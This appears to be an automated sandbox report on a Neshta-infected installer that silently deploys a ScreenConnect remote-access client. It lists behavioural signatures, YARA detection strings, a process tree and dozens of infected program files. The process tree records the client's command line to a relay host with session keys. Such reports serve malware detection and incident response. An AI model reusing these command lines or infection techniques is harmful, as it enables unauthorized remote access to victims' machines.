
Windows Analysis Report $RUX313H.exe

Overview

General Information

Sample Name: $RUX313H.exe
Analysis ID: 495328
MD5: 08ea055b45225ec89643836bae3c0446
SHA1: dad2ac19848eb8361e735323d4581e6a724d5b39
SHA256: 2abf676ca2b221ca6dd7bd11facf8d003dff541ad4d5618cb86b39e9bfdb906e

Detection

Detected: ScreenConnect Tool, Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Neshta
Antivirus detection for dropped file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Infects executable files (exe, dll, sys, html)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files with a suspicious file extension
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Yara detected ScreenConnect Tool
Creates files inside the system directory
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services

Process Tree

  • System is w10x64
  • $RUX313H.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\$RUX313H.exe' MD5: 08EA055B45225EC89643836BAE3C0446)
    • $RUX313H.exe (PID: 6792 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe' MD5: 47264A537967C64B5651F5E2932CA18A)
      • svchost.com (PID: 5568 cmdline: 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi' MD5: 36FD5E09C417C767A952B4609D73A54B)
        • msiexec.exe (PID: 5468 cmdline: C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 5648 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5184 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • rundll32.exe (PID: 5384 cmdline: rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • msiexec.exe (PID: 864 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 3240 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • ScreenConnect.ClientService.exe (PID: 6356 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN' MD5: 79EC78769BF8092719B0E72B174BAB54)
    • ScreenConnect.WindowsClient.exe (PID: 5196 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User' MD5: 5597916ED66980D09C38DD206054CD6F)
  • svchost.exe (PID: 5600 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
$RUX313H.exe | JoeSecurity_Neshta | Yara detected Neshta | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth |
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE | JoeSecurity_Neshta | Yara detected Neshta | Joe Security |
C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth |
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe | JoeSecurity_Neshta | Yara detected Neshta | Joe Security |
C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth |
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
(table truncated; 219 entries)

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp | JoeSecurity_Neshta | Yara detected Neshta | Joe Security |
0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(table truncated; 3 entries)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.svchost.com.400000.0.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth |
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
2.2.svchost.com.400000.0.unpack | JoeSecurity_Neshta | Yara detected Neshta | Joe Security |
11.0.ScreenConnect.WindowsClient.exe.920000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
11.2.ScreenConnect.WindowsClient.exe.920000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.2.ScreenConnect.ClientService.exe.3db0000.8.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(table truncated; 6 entries)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Neshta.A
Antivirus / Scanner detection for submitted sample
Source: $RUX313H.exe | Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | ReversingLabs: Detection: 95%
Machine Learning detection for sample
Source: $RUX313H.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.svchost.com.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 0.0.$RUX313H.exe.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 0.2.$RUX313H.exe.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 2.0.svchost.com.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: $RUX313H.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdbzz | source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb | source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp
Source: Binary string: c:\Users\jmorgan\Source\ScreenConnectWork\Custom\DotNetRunner\DotNetResolver\obj\Release\DotNetResolver.pdb | source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmp
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb | source: $RUX313H.exe, 00000000.00000003.661576351.000000000261D000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb | source: $RUX313H.exe, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp

Spreading:

Yara detected Neshta
Source: Yara match | File source: $RUX313H.exe, type: SAMPLE
Source: Yara match | File source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
